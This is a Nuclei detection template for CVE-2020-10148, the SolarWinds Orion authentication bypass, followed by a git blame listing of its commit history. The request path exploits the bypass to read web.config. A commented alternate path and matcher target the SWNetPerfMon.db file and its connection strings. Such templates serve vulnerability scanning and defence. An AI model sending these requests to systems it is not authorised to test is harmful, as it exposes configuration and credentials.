nuclei-templates/cves/2020/CVE-2020-10148.yaml

id: CVE-2020-10148

info:
  name: SolarWinds Orion API Auth Bypass Leads to RCE (SUPERNOVA)
  author: dwisiswant0
  severity: high
  description: |
    This template could allow to bypass authentication and execute API
    commands which may result in a compromise of the SolarWinds instance.
  reference: https://kb.cert.org/vuls/id/843464
  tags: cve,cve2020,solarwinds,rce

  # References:
  # - https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml
  # - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965
  # - https://twitter.com/0xsha/status/1343800953946787847

requests:
  - method: GET
    path:
      - "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"

     # - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
     # Above path can be used if you are looking to scan for "SWNetPerfMon.db" file.

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SolarWinds.Orion.Core."
        part: body

      - type: word
        words:
          - "text/plain"
        part: header

      - type: status
        status:
          - 200

#      - type: word
#        words:
#          - "Connection String"
#          - "text/plain"
#        part: all
#        condition: and
#
# Commented matchers can be used for "SWNetPerfMon.db" file.
misc changes 2021-01-02 04:56:15 +00:00			`id: CVE-2020-10148`
:fire: Add CVE-2020-10148 2020-12-29 07:32:08 +00:00
			`info:`
			`name: SolarWinds Orion API Auth Bypass Leads to RCE (SUPERNOVA)`
			`author: dwisiswant0`
			`severity: high`
			`description: \|`
			`This template could allow to bypass authentication and execute API`
			`commands which may result in a compromise of the SolarWinds instance.`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`reference: https://kb.cert.org/vuls/id/843464`
			`tags: cve,cve2020,solarwinds,rce`
:fire: Add CVE-2020-10148 2020-12-29 07:32:08 +00:00
			`# References:`
:hammer: Simplify matchers & add more references 2020-12-31 08:40:10 +00:00			`# - https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml`
:fire: Add CVE-2020-10148 2020-12-29 07:32:08 +00:00			`# - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965`
:pencil2: Replace reference 2020-12-31 09:12:13 +00:00			`# - https://twitter.com/0xsha/status/1343800953946787847`
:fire: Add CVE-2020-10148 2020-12-29 07:32:08 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update CVE-2020-10148.yaml 2021-01-01 10:40:35 +00:00			`- "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"`
updating matchers and path 2021-01-01 10:38:09 +00:00
Update CVE-2020-10148.yaml 2021-01-01 10:40:35 +00:00			`# - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"`
			`# Above path can be used if you are looking to scan for "SWNetPerfMon.db" file.`
updating matchers and path 2021-01-01 10:38:09 +00:00
:fire: Add CVE-2020-10148 2020-12-29 07:32:08 +00:00			`matchers-condition: and`
			`matchers:`
:hammer: Splitting matcher parts 2020-12-31 08:51:24 +00:00			`- type: word`
			`words:`
			`- "SolarWinds.Orion.Core."`
Update CVE-2020-10148.yaml 2021-01-01 11:33:22 +00:00			`part: body`

			`- type: word`
			`words:`
updating matchers and path 2021-01-01 10:38:09 +00:00			`- "text/plain"`
Update CVE-2020-10148.yaml 2021-01-01 11:33:22 +00:00			`part: header`
updating matchers and path 2021-01-01 10:38:09 +00:00
:fire: Add CVE-2020-10148 2020-12-29 07:32:08 +00:00			`- type: status`
			`status:`
			`- 200`
updating matchers and path 2021-01-01 10:38:09 +00:00
			`# - type: word`
			`# words:`
			`# - "Connection String"`
			`# - "text/plain"`
			`# part: all`
fixing typos 2021-03-10 14:03:49 +00:00			`# condition: and`
updating matchers and path 2021-01-01 10:38:09 +00:00			`#`
			`# Commented matchers can be used for "SWNetPerfMon.db" file.`